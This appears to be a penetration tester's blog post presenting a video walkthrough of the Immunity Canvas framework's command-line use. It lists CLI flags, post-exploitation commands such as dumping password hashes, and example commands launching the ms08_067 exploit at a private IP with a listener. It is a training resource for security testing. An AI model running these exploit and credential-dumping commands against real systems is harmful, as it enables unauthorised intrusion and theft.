This weekend was my first time playing around with Immunity Canvas. I noticed a lack of documentation for anything Non-Gui based regarding the framework. Since i had such a hard time tracking down information I decided to make a video showing Canvas basic CMDLine usage and tried to explain some module code based on my initial analysis I hope it helps
Note:
I have no previous experience with Canvas but this 20 minute video is everything I learned after playing around for a couple hours and searching everywhere for info..
Whats in this video:
-High Level Explanation of 2 modules(Exploit and Aux)
-CmdLine usage for launching exploits and Aux Modules
-Using PostEx modules after gaining a shell
-Setting up Listeners and finding modules to run
Immunity Canvas Code and CMDLine Walkthrough from ficti0n on Vimeo.
CMDLINE Flags:
-t Target
-p Port
-v Version of OS/target
-l Your listening IP
-d Your Listening port
PostEx Stuff:
help
runmodule getpasswordhashes
shellshocked
ps
killprocess
Running Exploit Without a Listener
./exploits/ms08_067/ms08_067.py -t 192.168.1.65 -v
Running Exploit with Listener
./commandlineinterface.py -v 10 -p 4445
./exploits/ms08_067/ms08_067.py -t 192.168.1.65 -l 192.168.1.121 -d 4445
Subscribe to:
Post Comments (Atom)
Real World Social Engineering Part 2: Integrating SE With Stealth Badge Readers Tips and Tricks
Below is a video on using stealth readers with social engineering to gain access to physical targets on your penetration tests.. This is ...
-
"Swan song" is a metaphorical phrase for a final gesture, effort, or performance given just before death or retirement. This post ...
-
Firstly this post requires the following song to be playing. http://www.youtube.com/watch?v=wVfjwIyc-CU Now that we got that out of...
-
A few months ago I noticed that Citrix provides virtual appliances to test their applications, I decided to pull down an appliance and ...
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.